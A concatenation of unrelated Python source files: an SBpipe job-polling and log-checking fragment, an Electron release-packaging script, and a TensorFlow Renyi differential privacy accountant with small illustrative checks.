                # decode bytes to str so the `job_name not in output` test works on Python 3
                output = p.communicate()[0].decode('utf-8')
else:
my_poll = subprocess.Popen(["bjobs", "-psr"], stdout=subprocess.PIPE)
output = my_poll.communicate()[0]
if job_name not in output:
found = False
logger.info("Computation terminated.")
return quick_debug(cmd, out_dir, err_dir)
def quick_debug(cmd, out_dir, err_dir):
"""
    Look for `error` and `warning` in the standard output and error files.
    A simple debugging function checking the generated log files. We don't stop the
    computation because these messages are often warnings rather than real errors.
    :param cmd: the executed command
    :param out_dir: the directory containing the standard output files
    :param err_dir: the directory containing the standard error files
:return: True
"""
outcome = True
logger.debug("Running parcomp.quick_debug()")
filename = os.path.join(err_dir, "j1")
if os.path.isfile(filename):
if not is_output_file_clean(filename, 'standard error'):
outcome = False
filename = os.path.join(out_dir, "j1")
if os.path.isfile(filename):
if not is_output_file_clean(filename, 'standard output'):
outcome = False
if not outcome:
logger.warning("\nSome computation might have failed. Please check the output in the folders:")
logger.warning("\t" + out_dir + ' (standard output)')
logger.warning("\t" + err_dir + ' (standard error)')
logger.warning("For additional information, run SBpipe using the `--verbose` option.")
logger.warning("(ignore previous warnings if results are generated as expected)")
else:
logger.info("If errors occur, please check the output in the folders: ")
logger.info("\t" + out_dir + ' (standard output)')
logger.info("\t" + err_dir + ' (standard error)')
logger.info("For additional information, run SBpipe using the `--verbose` option.")
# return outcome
return True
def is_output_file_clean(filename, stream_type='standard output'):
"""
    Check whether a file contains the string 'error' or 'warning'. If so, a message is logged.
    :param filename: a file
    :param stream_type: a label for the logged message, e.g. 'standard error' or 'standard output'
    :return: False if the file contains the word `error`, True otherwise
"""
with open(filename) as my_file:
content = my_file.read().replace('\n', ' ').lower()
if 'error' in content:
logger.warning('Found word `error` in ' + stream_type)
logger.warning('\n' + content)
return False
elif 'warning' in content:
logger.warning('Found word `warning` in ' + stream_type)
logger.warning('\n' + content)
else:
logger.debug('\n' + content)
return True
|
|
#!/usr/bin/env python
import glob
import os
import re
import shutil
import subprocess
import sys
import stat
from lib.config import LIBCHROMIUMCONTENT_COMMIT, BASE_URL, PLATFORM, \
get_target_arch, get_chromedriver_version, \
get_platform_key
from lib.util import scoped_cwd, rm_rf, get_electron_version, make_zip, \
execute, electron_gyp
ELECTRON_VERSION = get_electron_version()
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
DIST_DIR = os.path.join(SOURCE_ROOT, 'dist')
OUT_DIR = os.path.join(SOURCE_ROOT, 'out', 'R')
CHROMIUM_DIR = os.path.join(SOURCE_ROOT, 'vendor', 'brightray', 'vendor',
'download', 'libchromiumcontent', 'static_library')
PROJECT_NAME = electron_gyp()['project_name%']
PRODUCT_NAME = electron_gyp()['product_name%']
TARGET_BINARIES = {
'darwin': [
],
'win32': [
'{0}.exe'.format(PROJECT_NAME), # 'electron.exe'
'content_shell.pak',
'd3dcompiler_47.dll',
'icudtl.dat',
'libEGL.dll',
'libGLESv2.dll',
'ffmpeg.dll',
'node.dll',
'content_resources_200_percent.pak',
'ui_resources_200_percent.pak',
'xinput1_3.dll',
'natives_blob.bin',
'snapshot_blob.bin',
],
'linux': [
PROJECT_NAME, # 'electron'
'content_shell.pak',
'icudtl.dat',
'libffmpeg.so',
'libnode.so',
'natives_blob.bin',
'snapshot_blob.bin',
],
}
TARGET_DIRECTORIES = {
'darwin': [
'{0}.app'.format(PRODUCT_NAME),
],
'win32': [
'resources',
'locales',
],
'linux': [
'resources',
'locales',
],
}
def main():
rm_rf(DIST_DIR)
os.makedirs(DIST_DIR)
force_build()
create_symbols()
copy_binaries()
copy_chrome_binary('chromedriver')
copy_chrome_binary('mksnapshot')
copy_license()
if PLATFORM == 'linux':
strip_binaries()
create_version()
create_dist_zip()
create_chrome_binary_zip('chromedriver', get_chromedriver_version())
create_chrome_binary_zip('mksnapshot', ELECTRON_VERSION)
create_ffmpeg_zip()
create_symbols_zip()
def force_build():
build = os.path.join(SOURCE_ROOT, 'script', 'build.py')
execute([sys.executable, build, '-c', 'Release'])
def copy_binaries():
for binary in TARGET_BINARIES[PLATFORM]:
shutil.copy2(os.path.join(OUT_DIR, binary), DIST_DIR)
for directory in TARGET_DIRECTORIES[PLATFORM]:
shutil.copytree(os.path.join(OUT_DIR, directory),
os.path.join(DIST_DIR, directory),
symlinks=True)
def copy_chrome_binary(binary):
if PLATFORM == 'win32':
binary += '.exe'
src = os.path.join(CHROMIUM_DIR, binary)
dest = os.path.join(DIST_DIR, binary)
# Copy file and keep the executable bit.
shutil.copyfile(src, dest)
os.chmod(dest, os.stat(dest).st_mode | stat.S_IEXEC)
def copy_license():
shutil.copy2(os.path.join(CHROMIUM_DIR, '..', 'LICENSES.chromium.html'),
DIST_DIR)
shutil.copy2(os.path.join(SOURCE_ROOT, 'LICENSE'), DIST_DIR)
def strip_binaries():
for binary in TARGET_BINARIES[PLATFORM]:
if binary.endswith('.so') or '.' not in binary:
strip_binary(os.path.join(DIST_DIR, binary))
def strip_binary(binary_path):
if get_target_arch() == 'arm':
strip = 'arm-linux-gnueabihf-strip'
else:
strip = 'strip'
execute([strip, binary_path])
def create_version():
version_path = os.path.join(SOURCE_ROOT, 'dist', 'version')
with open(version_path, 'w') as version_file:
version_file.write(ELECTRON_VERSION)
def create_symbols():
destination = os.path.join(DIST_DIR, '{0}.breakpad.syms'.format(PROJECT_NAME))
dump_symbols = os.path.join(SOURCE_ROOT, 'script', 'dump-symbols.py')
execute([sys.executable, dump_symbols, destination])
if PLATFORM == 'darwin':
dsyms = glob.glob(os.path.join(OUT_DIR, '*.dSYM'))
for dsym in dsyms:
shutil.copytree(dsym, os.path.join(DIST_DIR, os.path.basename(dsym)))
def create_dist_zip():
dist_name = '{0}-{1}-{2}-{3}.zip'.format(PROJECT_NAME, ELECTRON_VERSION,
get_platform_key(),
get_target_arch())
zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
with scoped_cwd(DIST_DIR):
files = TARGET_BINARIES[PLATFORM] + ['LICENSE', 'LICENSES.chromium.html',
'version']
dirs = TARGET_DIRECTORIES[PLATFORM]
make_zip(zip_file, files, dirs)
def create_chrome_binary_zip(binary, version):
dist_name = '{0}-{1}-{2}-{3}.zip'.format(binary, version, get_platform_key(),
get_target_arch())
zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
with scoped_cwd(DIST_DIR):
files = ['LICENSE', 'LICENSES.chromium.html']
if PLATFORM == 'win32':
files += [binary + '.exe']
else:
files += [binary]
make_zip(zip_file, files, [])
def create_ffmpeg_zip():
dist_name = 'ffmpeg-{0}-{1}-{2}.zip'.format(
ELECTRON_VERSION, get_platform_key(), get_target_arch())
zip_file = os.path.join(SOURCE_ROOT, 'dist', dist_name)
if PLATFORM == 'darwin':
ffmpeg_name = 'libffmpeg.dylib'
elif PLATFORM == 'linux':
ffmpeg_name = 'libffmpeg.so'
elif PLATFORM == 'win32':
ffmpeg_name = 'ffmpeg.dll'
shutil.copy2(os.path.join(CHROMIUM_DIR, '..', 'ffmpeg', ffmpeg_name),
DIST_DIR)
if PLATFORM == 'linux':
strip_binary(os.path.join(DIST_DIR, ffmpeg_name))
with scoped_cwd(DIST_DIR):
make_zip(zip_file, [ffmpeg_name, 'LICENSE', 'LICENSES.chromium.html'], [])
def create_symbols_zip():
dist_name = '{0}-{1}-{2}-{3}-symbols.zip'.format(PROJECT_NAME,
ELECTRON_VERSION,
get_platform_key(),
get_target_arch())
zip_file = os.path.join(DIST_DIR, dist_name)
licenses = ['LICENSE', 'LICENSES.chromium.html', 'version']
with scoped_cwd(DIST_DIR):
dirs = ['{0}.breakpad.syms'.format(PROJECT_NAME)]
make_zip(zip_file, licenses, dirs)
if PLATFORM == 'darwin':
dsym_name = '{0}-{1}-{2}-{3}-dsym.zip'.format(PROJECT_NAME,
ELECTRON_VERSION,
get_platform_key(),
get_target_arch())
with scoped_cwd(DIST_DIR):
dsyms = glob.glob('*.dSYM')
make_zip(os.path.join(DIST_DIR, dsym_name), licenses, dsyms)
if __name__ == '__main__':
sys.exit(main())
|
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Privacy accountant that uses Renyi differential privacy."""
import math
from typing import Collection, Optional, Union
import numpy as np
from scipy import special
import six
from dp_accounting import dp_event
from dp_accounting import privacy_accountant
NeighborRel = privacy_accountant.NeighboringRelation
def _log_add(logx, logy):
"""Adds two numbers in the log space."""
a, b = min(logx, logy), max(logx, logy)
if a == -np.inf: # adding 0
return b
# Use exp(a) + exp(b) = (exp(a - b) + 1) * exp(b)
return math.log1p(math.exp(a - b)) + b # log1p(x) = log(x + 1)
def _log_sub(logx, logy):
"""Subtracts two numbers in the log space. Answer must be non-negative."""
if logx < logy:
raise ValueError('The result of subtraction must be non-negative.')
if logy == -np.inf: # subtracting 0
return logx
if logx == logy:
return -np.inf # 0 is represented as -np.inf in the log space.
try:
# Use exp(x) - exp(y) = (exp(x - y) - 1) * exp(y).
return math.log(math.expm1(logx - logy)) + logy # expm1(x) = exp(x) - 1
except OverflowError:
return logx
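# Illustrative sketch (added for exposition, not part of the original module):
# the log-space helpers above agree with ordinary arithmetic.
def _demo_log_space_arithmetic():
  log2, log3, log5 = math.log(2.), math.log(3.), math.log(5.)
  assert abs(_log_add(log2, log3) - log5) < 1e-12  # 2 + 3 == 5
  assert abs(_log_sub(log5, log3) - log2) < 1e-12  # 5 - 3 == 2
  assert _log_add(-np.inf, log2) == log2  # adding 0 is a no-op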
def _log_sub_sign(logx, logy):
"""Returns log(exp(logx)-exp(logy)) and its sign."""
if logx > logy:
s = True
mag = logx + np.log(1 - np.exp(logy - logx))
elif logx < logy:
s = False
mag = logy + np.log(1 - np.exp(logx - logy))
else:
s = True
mag = -np.inf
return s, mag
def _log_comb(n, k):
"""Computes log of binomial coefficient."""
return (special.gammaln(n + 1) - special.gammaln(k + 1) -
special.gammaln(n - k + 1))
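# Illustrative sketch (exposition only): _log_comb is the log of the binomial
# coefficient, checked here against C(5, 2) = 10.
def _demo_log_comb():
  assert abs(_log_comb(5, 2) - math.log(10.)) < 1e-12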
def _compute_log_a_int(q, sigma, alpha):
"""Computes log(A_alpha) for integer alpha, 0 < q < 1."""
assert isinstance(alpha, six.integer_types)
# Initialize with 0 in the log space.
log_a = -np.inf
for i in range(alpha + 1):
log_coef_i = (
_log_comb(alpha, i) + i * math.log(q) + (alpha - i) * math.log(1 - q))
s = log_coef_i + (i * i - i) / (2 * (sigma**2))
log_a = _log_add(log_a, s)
return float(log_a)
def _compute_log_a_frac(q, sigma, alpha):
"""Computes log(A_alpha) for fractional alpha, 0 < q < 1."""
# The two parts of A_alpha, integrals over (-inf,z0] and [z0, +inf), are
# initialized to 0 in the log space:
log_a0, log_a1 = -np.inf, -np.inf
i = 0
z0 = sigma**2 * math.log(1 / q - 1) + .5
while True: # do ... until loop
coef = special.binom(alpha, i)
log_coef = math.log(abs(coef))
j = alpha - i
log_t0 = log_coef + i * math.log(q) + j * math.log(1 - q)
log_t1 = log_coef + j * math.log(q) + i * math.log(1 - q)
log_e0 = math.log(.5) + _log_erfc((i - z0) / (math.sqrt(2) * sigma))
log_e1 = math.log(.5) + _log_erfc((z0 - j) / (math.sqrt(2) * sigma))
log_s0 = log_t0 + (i * i - i) / (2 * (sigma**2)) + log_e0
log_s1 = log_t1 + (j * j - j) / (2 * (sigma**2)) + log_e1
if coef > 0:
log_a0 = _log_add(log_a0, log_s0)
log_a1 = _log_add(log_a1, log_s1)
else:
log_a0 = _log_sub(log_a0, log_s0)
log_a1 = _log_sub(log_a1, log_s1)
i += 1
if max(log_s0, log_s1) < -30:
break
return _log_add(log_a0, log_a1)
def _log_erfc(x):
"""Computes log(erfc(x)) with high accuracy for large x."""
try:
return math.log(2) + special.log_ndtr(-x * 2**.5)
except NameError:
# If log_ndtr is not available, approximate as follows:
r = special.erfc(x)
if r == 0.0:
# Using the Laurent series at infinity for the tail of the erfc function:
# erfc(x) ~ exp(-x^2-.5/x^2+.625/x^4)/(x*pi^.5)
# To verify in Mathematica:
# Series[Log[Erfc[x]] + Log[x] + Log[Pi]/2 + x^2, {x, Infinity, 6}]
return (-math.log(math.pi) / 2 - math.log(x) - x**2 - .5 * x**-2 +
.625 * x**-4 - 37. / 24. * x**-6 + 353. / 64. * x**-8)
else:
return math.log(r)
def _compute_delta(orders, rdp, epsilon):
"""Compute delta given a list of RDP values and target epsilon.
Args:
orders: An array of orders.
rdp: An array of RDP guarantees.
epsilon: The target epsilon.
Returns:
Optimal delta.
Raises:
ValueError: If input is malformed.
"""
if epsilon < 0:
raise ValueError(f'Epsilon cannot be negative. Found {epsilon}.')
if len(orders) != len(rdp):
raise ValueError('Input lists must have the same length.')
# Basic bound (see https://arxiv.org/abs/1702.07476 Proposition 3 in v3):
# delta = min( np.exp((rdp - epsilon) * (orders - 1)) )
# Improved bound from https://arxiv.org/abs/2004.00010 Proposition 12 (in v4):
logdeltas = [] # work in log space to avoid overflows
for (a, r) in zip(orders, rdp):
if a < 1:
raise ValueError(f'Renyi divergence order must be at least 1. Found {a}.')
if r < 0:
raise ValueError(f'Renyi divergence cannot be negative. Found {r}.')
    # For small alpha, we are better off with the bound via KL divergence:
# delta <= sqrt(1-exp(-KL)).
# Take a min of the two bounds.
if r == 0:
logdelta = -np.inf
else:
logdelta = 0.5 * math.log1p(-math.exp(-r))
if a > 1.01:
# This bound is not numerically stable as alpha->1.
      # Thus we require a minimum value for alpha.
      # The bound is also not useful for small alpha, so it doesn't matter.
rdp_bound = (a - 1) * (r - epsilon + math.log1p(-1 / a)) - math.log(a)
logdelta = min(logdelta, rdp_bound)
logdeltas.append(logdelta)
return min(math.exp(np.min(logdeltas)), 1.)
def _compute_epsilon(orders, rdp, delta):
"""Compute epsilon given a list of RDP values and target delta.
Args:
orders: An array of orders.
rdp: An array of RDP guarantees.
delta: The target delta. Must be >= 0.
Returns:
Optimal epsilon.
Raises:
ValueError: If input is malformed.
"""
if delta < 0:
raise ValueError(f'Delta cannot be negative. Found {delta}.')
if delta == 0:
if all(r == 0 for r in rdp):
return 0
else:
return np.inf
if len(orders) != len(rdp):
raise ValueError('Input lists must have the same length.')
# Basic bound (see https://arxiv.org/abs/1702.07476 Proposition 3 in v3):
# epsilon = min( rdp - math.log(delta) / (orders - 1) )
# Improved bound from https://arxiv.org/abs/2004.00010 Proposition 12 (in v4).
# Also appears in https://arxiv.org/abs/2001.05990 Equation 20 (in v1).
eps = []
for (a, r) in zip(orders, rdp):
if a < 1:
raise ValueError(f'Renyi divergence order must be at least 1. Found {a}.')
if r < 0:
raise ValueError(f'Renyi divergence cannot be negative. Found {r}.')
if delta**2 + math.expm1(-r) > 0:
# In this case, we can simply bound via KL divergence:
# delta <= sqrt(1-exp(-KL)).
epsilon = 0 # No need to try further computation if we have epsilon = 0.
elif a > 1.01:
# This bound is not numerically stable as alpha->1.
      # Thus we require a minimum value of alpha.
      # The bound is also not useful for small alpha, so it doesn't matter.
epsilon = r + math.log1p(-1 / a) - math.log(delta * a) / (a - 1)
else:
# In this case we can't do anything. E.g., asking for delta = 0.
epsilon = np.inf
eps.append(epsilon)
return max(0, np.min(eps))
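# Illustrative sketch (exposition only): _compute_epsilon and _compute_delta
# are duals built from the same per-order bound, so converting a target delta
# to an epsilon and back can only tighten delta. The numbers below are
# arbitrary example values.
def _demo_epsilon_delta_roundtrip():
  orders = [2.0, 4.0, 8.0]
  rdp = [0.1, 0.2, 0.4]
  target_delta = 1e-5
  eps = _compute_epsilon(orders, rdp, target_delta)
  assert _compute_delta(orders, rdp, eps) <= target_delta + 1e-12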
def _stable_inplace_diff_in_log(vec, signs, n=-1):
"""Replaces the first n-1 dims of vec with the log of abs difference operator.
Args:
vec: numpy array of floats with size larger than 'n'
signs: Optional numpy array of bools with the same size as vec in case one
needs to compute partial differences vec and signs jointly describe a
vector of real numbers' sign and abs in log scale.
n: Optonal upper bound on number of differences to compute. If negative, all
differences are computed.
Returns:
The first n-1 dimension of vec and signs will store the log-abs and sign of
the difference.
Raises:
ValueError: If input is malformed.
"""
assert vec.shape == signs.shape
if n < 0:
n = np.max(vec.shape) - 1
else:
assert np.max(vec.shape) >= n + 1
for j in range(0, n, 1):
if signs[j] == signs[j + 1]: # When the signs are the same
# if the signs are both positive, then we can just use the standard one
signs[j], vec[j] = _log_sub_sign(vec[j + 1], vec[j])
# otherwise, we do that but toggle the sign
if not signs[j + 1]:
signs[j] = ~signs[j]
else: # When the signs are different.
vec[j] = _log_add(vec[j], vec[j + 1])
signs[j] = signs[j + 1]
def _get_forward_diffs(fun, n):
"""Computes up to nth order forward difference evaluated at 0.
See Theorem 27 of https://arxiv.org/pdf/1808.00087.pdf
Args:
fun: Function to compute forward differences of.
n: Number of differences to compute.
Returns:
Pair (deltas, signs_deltas) of the log deltas and their signs.
"""
func_vec = np.zeros(n + 3)
signs_func_vec = np.ones(n + 3, dtype=bool)
# ith coordinate of deltas stores log(abs(ith order discrete derivative))
deltas = np.zeros(n + 2)
signs_deltas = np.zeros(n + 2, dtype=bool)
for i in range(1, n + 3, 1):
func_vec[i] = fun(1.0 * (i - 1))
for i in range(0, n + 2, 1):
# Diff in log scale
_stable_inplace_diff_in_log(func_vec, signs_func_vec, n=n + 2 - i)
deltas[i] = func_vec[0]
signs_deltas[i] = signs_func_vec[0]
return deltas, signs_deltas
def _compute_log_a(q, noise_multiplier, alpha):
if float(alpha).is_integer():
return _compute_log_a_int(q, noise_multiplier, int(alpha))
else:
return _compute_log_a_frac(q, noise_multiplier, alpha)
def _compute_rdp_poisson_subsampled_gaussian(q, noise_multiplier, orders):
"""Computes RDP of the Poisson sampled Gaussian mechanism.
Args:
q: The sampling rate.
noise_multiplier: The ratio of the standard deviation of the Gaussian noise
to the l2-sensitivity of the function to which it is added.
orders: An array of RDP orders.
Returns:
The RDPs at all orders. Can be `np.inf`.
"""
def compute_one_order(q, alpha):
if np.isinf(alpha) or noise_multiplier == 0:
return np.inf
if q == 0:
return 0
if q == 1.:
return alpha / (2 * noise_multiplier**2)
return _compute_log_a(q, noise_multiplier, alpha) / (alpha - 1)
return np.array([compute_one_order(q, order) for order in orders])
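# Illustrative sketch (exposition only): the q == 0 and q == 1 fast paths of
# the Poisson-subsampled Gaussian RDP computation, checked against the closed
# forms used in compute_one_order above.
def _demo_poisson_subsampled_edge_cases():
  orders = np.array([2.0, 16.0])
  sigma = 1.5
  assert np.all(_compute_rdp_poisson_subsampled_gaussian(0.0, sigma, orders) == 0)
  expected = orders / (2 * sigma**2)  # RDP of the plain Gaussian mechanism
  assert np.allclose(
      _compute_rdp_poisson_subsampled_gaussian(1.0, sigma, orders), expected)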
def _compute_rdp_sample_wor_gaussian(q, noise_multiplier, orders):
"""Computes RDP of Gaussian mechanism using sampling without replacement.
This function applies to the following schemes:
1. Sampling w/o replacement: Sample a uniformly random subset of size m = q*n.
2. ``Replace one data point'' version of differential privacy, i.e., n is
considered public information.
Reference: Theorem 27 of https://arxiv.org/pdf/1808.00087.pdf (A strengthened
version applies subsampled-Gaussian mechanism.)
- Wang, Balle, Kasiviswanathan. "Subsampled Renyi Differential Privacy and
Analytical Moments Accountant." AISTATS'2019.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
noise_multiplier: The ratio of the standard deviation of the Gaussian noise
to the l2-sensitivity of the function to which it is added.
orders: An array of RDP orders.
Returns:
The RDPs at all orders, can be np.inf.
"""
return np.array([
_compute_rdp_sample_wor_gaussian_scalar(q, noise_multiplier, order)
for order in orders
])
def _compute_rdp_sample_wor_gaussian_scalar(q, sigma, alpha):
"""Compute RDP of the Sampled Gaussian mechanism at order alpha.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
sigma: The std of the additive Gaussian noise.
alpha: The order at which RDP is computed.
Returns:
RDP at alpha, can be np.inf.
"""
assert (q <= 1) and (q >= 0) and (alpha >= 1)
if q == 0:
return 0
if q == 1.:
return alpha / (2 * sigma**2)
if np.isinf(alpha):
return np.inf
if float(alpha).is_integer():
return _compute_rdp_sample_wor_gaussian_int(q, sigma, int(alpha)) / (
alpha - 1)
else:
    # When alpha is not an integer, we apply Corollary 10 of [WBK19] to
    # interpolate the CGF and obtain an upper bound.
alpha_f = math.floor(alpha)
alpha_c = math.ceil(alpha)
x = _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha_f)
y = _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha_c)
t = alpha - alpha_f
return ((1 - t) * x + t * y) / (alpha - 1)
def _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha):
"""Compute log(A_alpha) for integer alpha, subsampling without replacement.
When alpha is smaller than max_alpha, compute the bound Theorem 27 exactly,
otherwise compute the bound with Stirling approximation.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
sigma: The std of the additive Gaussian noise.
alpha: The order at which RDP is computed.
Returns:
RDP at alpha, can be np.inf.
"""
max_alpha = 256
assert isinstance(alpha, six.integer_types)
if np.isinf(alpha):
return np.inf
elif alpha == 1:
return 0
def cgf(x):
# Return rdp(x+1)*x, the rdp of Gaussian mechanism is alpha/(2*sigma**2)
return x * 1.0 * (x + 1) / (2.0 * sigma**2)
def func(x):
# Return the rdp of Gaussian mechanism
return 1.0 * x / (2.0 * sigma**2)
# Initialize with 1 in the log space.
log_a = 0
# Calculates the log term when alpha = 2
log_f2m1 = func(2.0) + np.log(1 - np.exp(-func(2.0)))
if alpha <= max_alpha:
# We need forward differences of exp(cgf)
# The following line is the numerically stable way of implementing it.
# The output is in polar form with logarithmic magnitude
deltas, _ = _get_forward_diffs(cgf, alpha)
    # Computing the bound exactly requires O(alpha**2) bookkeeping.
for i in range(2, alpha + 1):
if i == 2:
s = 2 * np.log(q) + _log_comb(alpha, 2) + np.minimum(
np.log(4) + log_f2m1,
func(2.0) + np.log(2))
elif i > 2:
delta_lo = deltas[int(2 * np.floor(i / 2.0)) - 1]
delta_hi = deltas[int(2 * np.ceil(i / 2.0)) - 1]
s = np.log(4) + 0.5 * (delta_lo + delta_hi)
s = np.minimum(s, np.log(2) + cgf(i - 1))
s += i * np.log(q) + _log_comb(alpha, i)
log_a = _log_add(log_a, s)
return float(log_a)
else:
    # Compute the bound with the Stirling approximation. Everything is O(x) now.
for i in range(2, alpha + 1):
if i == 2:
s = 2 * np.log(q) + _log_comb(alpha, 2) + np.minimum(
np.log(4) + log_f2m1,
func(2.0) + np.log(2))
else:
s = np.log(2) + cgf(i - 1) + i * np.log(q) + _log_comb(alpha, i)
log_a = _log_add(log_a, s)
return log_a
def _effective_gaussian_noise_multiplier(event: dp_event.DpEvent):
"""Determines the effective noise multiplier of nested structure of Gaussians.
A series of Gaussian queries on the same data can be reexpressed as a single
query with pre- and post- processing. For details, see section 3 of
https://arxiv.org/pdf/1812.06210.pdf.
Args:
event: A `dp_event.DpEvent`. In order for conversion to be successful it
must consist of a single `dp_event.GaussianDpEvent`, or a nested structure
of `dp_event.ComposedDpEvent` and/or `dp_event.SelfComposedDpEvent`
bottoming out in `dp_event.GaussianDpEvent`s.
Returns:
The noise multiplier of the equivalent `dp_event.GaussianDpEvent`, or None
if the input event was not a `dp_event.GaussianDpEvent` or a nested
structure of `dp_event.ComposedDpEvent` and/or
`dp_event.SelfComposedDpEvent` bottoming out in `dp_event.GaussianDpEvent`s.
"""
if isinstance(event, dp_event.GaussianDpEvent):
return event.noise_multiplier
elif isinstance(event, dp_event.ComposedDpEvent):
sum_sigma_inv_sq = 0
for e in event.events:
sigma = _effective_gaussian_noise_multiplier(e)
if sigma is None:
return None
sum_sigma_inv_sq += sigma**-2
return sum_sigma_inv_sq**-0.5
elif isinstance(event, dp_event.SelfComposedDpEvent):
sigma = _effective_gaussian_noise_multiplier(event.event)
return None if sigma is None else (event.count * sigma**-2)**-0.5
else:
return None
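# Illustrative sketch (exposition only): two sigma = 2.0 Gaussian queries on
# the same data compose into one Gaussian query with sigma = 2 / sqrt(2).
# Assumes the dp_event constructors accept the field values shown.
def _demo_effective_noise_multiplier():
  event = dp_event.ComposedDpEvent(
      events=[dp_event.GaussianDpEvent(2.0), dp_event.GaussianDpEvent(2.0)])
  sigma = _effective_gaussian_noise_multiplier(event)
  assert abs(sigma - 2.0 / math.sqrt(2.0)) < 1e-12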
def _compute_rdp_single_epoch_tree_aggregation(
noise_multiplier: float, step_counts: Union[int, Collection[int]],
orders: Collection[float]) -> Collection[float]:
"""Computes RDP of the Tree Aggregation Protocol for Gaussian Mechanism.
This function implements the accounting when the tree is periodically
restarted and no record occurs twice across all trees. See appendix D of
"Practical and Private (Deep) Learning without Sampling or Shuffling"
https://arxiv.org/abs/2103.00039.
Args:
noise_multiplier: A non-negative float representing the ratio of the
standard deviation of the Gaussian noise to the l2-sensitivity of the
function to which it is added.
step_counts: A scalar or a list of non-negative integers representing the
number of steps per epoch (between two restarts).
orders: An array of RDP orders.
Returns:
The RDPs at all orders. Can be `np.inf`.
"""
if noise_multiplier < 0:
raise ValueError(
f'noise_multiplier must be non-negative. Got {noise_multiplier}.')
if noise_multiplier == 0:
return np.inf
if not step_counts:
raise ValueError(
'steps_list must be a non-empty list, or a non-zero scalar. Got '
f'{step_counts}.')
if np.isscalar(step_counts):
step_counts = [step_counts]
for steps in step_counts:
if steps < 0:
raise ValueError(f'Steps must be non-negative. Got {step_counts}')
max_depth = max(math.ceil(math.log2(steps + 1)) for steps in step_counts)
return np.array([a * max_depth / (2 * noise_multiplier**2) for a in orders])
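# Illustrative sketch (exposition only): with 7 steps per epoch, the tree has
# depth ceil(log2(8)) = 3, so each order's RDP is alpha * 3 / (2 * sigma**2).
def _demo_tree_aggregation_rdp():
  orders = [2.0, 4.0]
  rdp = _compute_rdp_single_epoch_tree_aggregation(1.0, 7, orders)
  assert np.allclose(rdp, [a * 3 / 2.0 for a in orders])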
class RdpAccountant(privacy_accountant.PrivacyAccountant):
"""Privacy accountant that uses Renyi differential privacy."""
def __init__(
self,
orders: Optional[Collection[float]] = None,
neighboring_relation: NeighborRel = NeighborRel.ADD_OR_REMOVE_ONE,
):
super(RdpAccountant, self).__init__(neighboring_relation)
if orders is None:
# Default orders chosen to give good coverage for Gaussian mechanism in
# the privacy regime of interest. In the future, more orders might be
# added, in particular, fractional orders between 1.0 and 10.0 or so.
orders = [
2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 14, 16, 20, 24, 28, 32, 48, 64, 128,
256, 512, 1024
]
self._orders = np.array(orders)
self._rdp = np.zeros_like(orders, dtype=np.float64)
def supports(self, event: dp_event.DpEvent) -> bool:
return self._maybe_compose(event, 0, False)
def _compose(self, event: dp_event.DpEvent, count: int = 1):
self._maybe_compose(event, count, True)
def _maybe_compose(self, event: dp_event.DpEvent, count: int,
do_compose: bool) -> bool:
"""Traverses `event` and performs composition if `do_compose` is True.
If `do_compose` is False, can be used to check whether composition is
supported.
Args:
event: A `DpEvent` to process.
count: The number of times to compose the event.
do_compose: Whether to actually perform the composition.
Returns:
True if event is supported, otherwise False.
"""
if isinstance(event, dp_event.NoOpDpEvent):
return True
elif isinstance(event, dp_event.NonPrivateDpEvent):
if do_compose:
self._rdp += np.inf
return True
elif isinstance(event, dp_event.SelfComposedDpEvent):
return self._maybe_compose(event.event, event.count * count, do_compose)
elif isinstance(event, dp_event.ComposedDpEvent):
return all(
self._maybe_compose(e, count, do_compose) for e in event.events)
elif isinstance(event, dp_event.GaussianDpEvent):
if do_compose:
self._rdp += count * _compute_rdp_poisson_subsampled_gaussian(
q=1.0, noise_multiplier=event.noise_multiplier, orders=self._orders)
return True
elif isinstance(event, dp_event.PoissonSampledDpEvent):
if self._neighboring_relation is not NeighborRel.ADD_OR_REMOVE_ONE:
return False
gaussian_noise_multiplier = _effective_gaussian_noise_multiplier(
event.event)
if gaussian_noise_multiplier is None:
return False
if do_compose:
self._rdp += count * _compute_rdp_poisson_subsampled_gaussian(
q=event.sampling_probability,
noise_multiplier=gaussian_noise_multiplier,
orders=self._orders)
return True
elif isinstance(event, dp_event.SampledWithoutReplacementDpEvent):
if self._neighboring_relation is not NeighborRel.REPLACE_ONE:
return False
gaussian_noise_multiplier = _effective_gaussian_noise_multiplier(
event.event)
if gaussian_noise_multiplier is None:
return False
if do_compose:
self._rdp += count * _compute_rdp_sample_wor_gaussian(
q=event.sample_size / event.source_dataset_size,
noise_multiplier=gaussian_noise_multiplier,
orders=self._orders)
return True
elif isinstance(event, dp_event.SingleEpochTreeAggregationDpEvent):
if self._neighboring_relation is not NeighborRel.REPLACE_SPECIAL:
return False
if do_compose:
self._rdp += count * _compute_rdp_single_epoch_tree_aggregation(
event.noise_multiplier, event.step_counts, self._orders)
return True
else:
# Unsupported event (including `UnsupportedDpEvent`).
return False
def get_epsilon(self, target_delta: float) -> float:
return _compute_epsilon(self._orders, self._rdp, target_delta)
def get_delta(self, target_epsilon: float) -> float:
return _compute_delta(self._orders, self._rdp, target_epsilon)
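# Illustrative sketch (exposition only): typical end-to-end use of the
# accountant. `compose` is assumed to be inherited from
# privacy_accountant.PrivacyAccountant (it wraps the `_compose` defined
# above); the event and target delta are arbitrary example values.
def _demo_rdp_accountant():
  accountant = RdpAccountant()
  event = dp_event.GaussianDpEvent(noise_multiplier=1.1)
  assert accountant.supports(event)
  accountant.compose(event, count=100)
  assert accountant.get_epsilon(target_delta=1e-5) > 0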
|
|
#!/usr/bin/python3
#
